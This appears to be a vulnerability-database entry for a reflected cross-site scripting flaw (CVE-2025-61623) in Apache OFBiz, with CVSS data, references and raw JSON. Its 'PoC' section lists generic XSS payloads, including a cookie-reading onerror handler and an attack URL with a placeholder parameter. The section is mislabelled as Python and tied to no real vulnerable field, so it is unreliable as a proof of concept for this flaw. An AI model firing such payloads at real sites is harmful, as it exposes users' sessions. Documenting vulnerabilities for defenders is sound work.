Security Vulnerability Report
中文
CVE-2025-61623 CVSS 6.5 MEDIUM

CVE-2025-61623

Published: 2025-11-12 10:15:44
Last Modified: 2025-11-13 15:04:43
Source: [email protected]

Description

Reflected cross-site scripting vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.03. Users are recommended to upgrade to version 24.09.03, which fixes the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* - VULNERABLE
Apache OFBiz < 24.09.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-61623 PoC - Reflected XSS in Apache OFBiz --> <!-- Replace TARGET_URL with the vulnerable OFBiz instance URL --> <!-- PoC 1: Basic script injection --> <script>alert(document.domain)</script> <!-- PoC 2: Event handler injection --> <img src=x onerror=alert(document.cookie)> <!-- PoC 3: URL-encoded payload --> %3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E <!-- Example attack URL --> <!-- https://target-ofbiz.example.com/webtools/control/main?target_param=<script>alert(document.domain)</script> --> <!-- Recommended testing approach: 1. Identify input fields or URL parameters that reflect user input 2. Inject XSS payloads and observe if they are reflected without encoding 3. Use browser developer tools to inspect the response 4. Verify script execution in browser context -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61623", "sourceIdentifier": "[email protected]", "published": "2025-11-12T10:15:43.903", "lastModified": "2025-11-13T15:04:42.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected cross-site scripting vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 24.09.03.\n\nUsers are recommended to upgrade to version 24.09.03, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.09.03", "matchCriteriaId": "C0FD636F-C69E-4284-95A0-0CD8A5DEB08F"}]}]}], "references": [{"url": "https://issues.apache.org/jira/browse/OFBIZ-13295", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://lists.apache.org/thread/sb2mngrg766qbqt5g29fo0qblk3v4x5y", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://ofbiz.apache.org/download.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://ofbiz.apache.org/release-notes-24.09.03.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://ofbiz.apache.org/security.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/11/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.